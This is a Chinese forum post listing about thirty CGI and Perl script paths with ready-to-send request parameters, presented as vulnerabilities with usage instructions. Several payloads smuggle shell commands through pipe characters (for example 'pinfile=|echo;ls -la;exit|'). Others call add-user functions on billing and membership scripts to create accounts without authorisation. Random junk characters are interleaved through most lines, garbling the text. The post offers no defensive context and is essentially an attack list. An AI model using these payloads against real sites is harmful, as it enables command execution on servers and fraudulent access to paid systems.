找回密码
 立即注册
查看: 2911|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
==============================
3 l* a8 }  o, ~: y/ q8 T2 Q3 A/ x1 m9 t
/smspass.pl
  Y) X: v# {8 h$ D8 ]& J! nusername=username&password=password9 T+ o1 J7 Y+ t0 [2 F5 @& J
% Y2 J' O( Z# F# o. Z8 E- I
/index.cgi" `: f1 x8 b, R7 z9 F5 E+ t
wei=ren&gen=command0 a, V5 S0 T! O/ r' Y
" r' X- w' r/ k: ]4 H
/passmaster.cgi
! A) L! O/ A, C2 n: {Action=Add&Username=Username&Password=Password
( e% ]) O. D& }8 I! t6 M+ J7 K7 T( t6 F+ b1 @- J, w
/accountcreate.cgi. `, j* C  [" ^+ V& b2 Z& U, s
username=username&password=password&ref1=|echo;ls|7 B" S: p+ F- z$ X, B
! S' A5 r3 m( S2 c- A! ^
/form.cgi9 @3 o& C) H! F$ A0 Q2 S
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
- @. M- A4 B& h( _; D- n9 C' x+ f  Z2 s. l( B8 G7 @
/addusr.pl4 u# {+ s- G6 w" J) C0 w4 v
/cgi-bin/EuroDebit/addusr.pl3 H# v5 s7 Z. a& T! X# T
user=username&pass=Password&confirm=Password
: C2 u- R* h4 y5 h+ S: X6 r) X$ g5 [3 ]% x
/ccbill-local.asp
% W; Q5 q& `: Y/ mpost_values=username:password
+ r6 }6 h4 g2 ]: W3 u; \- A6 V; \& b
/count.cgi& y; Q" u- u4 l& I, p# S
pinfile=|echo;ls -la;exit|/ s- I% o% v! D% V. |  }$ u  S
. a" p/ o- @# y) f4 _; O' |+ P, {8 `
/recon.cgi
/ Y2 @$ ~% U: }1 D- W/recon.cgi?search
  A& c. h! o' E9 Q/ P$ wsearchoption=1&searchfor=|echo;ls -al;exit|
  o  i" W) C, {) x4 c! D; o+ o" \3 x2 q4 D! z6 L6 D
/verotelrum.pl
- q( c+ a# q+ j. H* ~vercode=username:password:dseegsow:add:amount<&30>
/ e) {' V4 t, I" t; p
9 B$ r# C, R- {) {7 R2 t6 N) m6 }/af.cgi
" u( ]; W: w% B* J* o7 u- ]_browser_out=|echo;ls -la;exit;|
- x. f1 u6 M6 d
: {. Q: }2 `( K$ W0 I/modify.cgi
* x2 s2 F! Q" Cusername=username&password=password&expire=30" y3 v6 @. p) t6 ]- o0 |
- x9 i$ C% }7 t, I  C& s# z) y# T( o
/openjournal.cgi
) J0 t  F% V+ Z0 o7 V* D. L$ @. Medit=1&ct=2&go=|echo;ls -al;exit|+ ~2 B% t) Q! f/ q8 M

6 C3 Z( r: R4 V3 [3 J4 h/gx9passwd.cgi7 f- u# h$ O" j5 A( u3 I( d
cmd=ADD&user=username&pass=password& @3 \; X7 Z0 r* Q# h$ z" u
9 }& s! {! r5 y  _4 q0 T
/probecontrol.cgi7 j( V( X! ^  p
command=enable&username=username&password=password
3 L! I- O0 Q% W( @7 |
% J+ e2 ]5 Z, Z9 D/recon.cgi
+ |, X& z- d0 Osearchoption=3&searchfor=echo;ls -la;exit
5 m4 z2 l. b; _. w; \5 M
- O; |' y5 g: V  Y/htadd.pl: S5 ?1 r4 y# x5 D, ?
configfile=|echo; ls -alt; exit
8 N1 Z  y- t, r) A
1 Z0 H' B0 f( z' U! t) s/gx9passwd.cgi
8 z$ P9 m  e" D& f3 j" lcmd=ADD&user=username&pass=password1 p. V# W( U, s, r  L

" h9 K+ P# q: Q& |/ibill*.pl( G3 G, `2 F5 V7 w1 x/ H
reqtype=add&authpwd=authpwd&username=username&password=password
5 [4 ^& V8 t& r! Y
& ]# a: w5 {# e1 d* B' m: n/cpay.cgi
" I& s/ B( E$ V3 i6 ecommand=add_member&username=username(EMAIL)&password=password(DES)
7 O/ K, O! y" N- j- ?
+ p! Q! k6 D: i3 H5 y) l/globill_ut.cgi
, r- ~/ J4 G% Z5 w! ^9 d9 Qdo=add&username=username&password=password&wpassword=password
" _5 p* `1 e( v+ q5 F! \; g% g; M1 S$ N. B" }' x& X% q
/usercontrol.cgi5 q& B1 d1 o7 M2 j% |( W$ g1 i
command=enable&username=USER&password=PASS
( ]+ m: _2 {$ @. t2 J9 I4 X
  j, n# M' m5 m0 T6 ^! h- N/globoSALErum.cgi
0 t5 U; j. X, V8 @7 p8 C6 Iaction=ADD&seccode=seccode&login=username&password=password; s6 Y3 Z1 ^7 E# E% V% ]! s
: C6 \- W3 [& J7 d$ t: O4 b
/addusr.pl8 Z4 }, }: J* d4 L  x) t/ [4 T* F1 p
user=USER&pass=PASS&confirm=PASS, i: t/ C6 o& q

/ e+ A. e% r+ j/ U% u& s: C! {4 S/pincount.cgi2 A% ?- }' [5 w4 k8 o
/cgi-bin/mastergate/pincount.cgi
8 |: v/ {* q2 P9 W0 |pinfile=|echo;pwd;exit|
" p" E$ u( U+ B2 I8 N, e
- t5 C! i: e& Q+ \" W9 S/accountcreate.cgi" A$ V9 O, ]# V( j& Z" x8 J! @
/cgi-bin/gateway/accountcreate.cgi
% A1 H, G# u2 O9 Cusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
' l1 `3 U6 \" c6 \! e$ s0 o9 `  k% e/ @! O- f; w
/af.cgi0 o, |# ?6 J1 Z; V% \
/env.cgi! [6 t9 U) D+ t# ^
ADD+;echo;pwd;exit- U( e6 W) n; x3 E( R, ?/ t

9 ], [/ ]* v3 G# V/count.cgi
! S1 F# v, J2 }1 ipinfile=|echo;pwd;exit|% X, R6 p. X% n( u& O

" b( R6 r4 X% Z, e: s5 E/recon.cgi, W1 A: r) c/ \' A
searchoption=1&searchfor=|echo;ls%20-al;exit|  p& x3 @8 E* Y, x

) K' q7 ?( w/ ]* N8 f' a1 U: `/add.cgi& V: n8 d( [; U9 R) m! D/ z0 |
username=username&password=password&expire=30& P& P' A7 w5 b9 j% a  X6 q& Y
  H7 Z% Z3 Y( L3 d6 ~, @
==============================6 j9 p9 w# F  ~" b6 x, _7 j+ X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表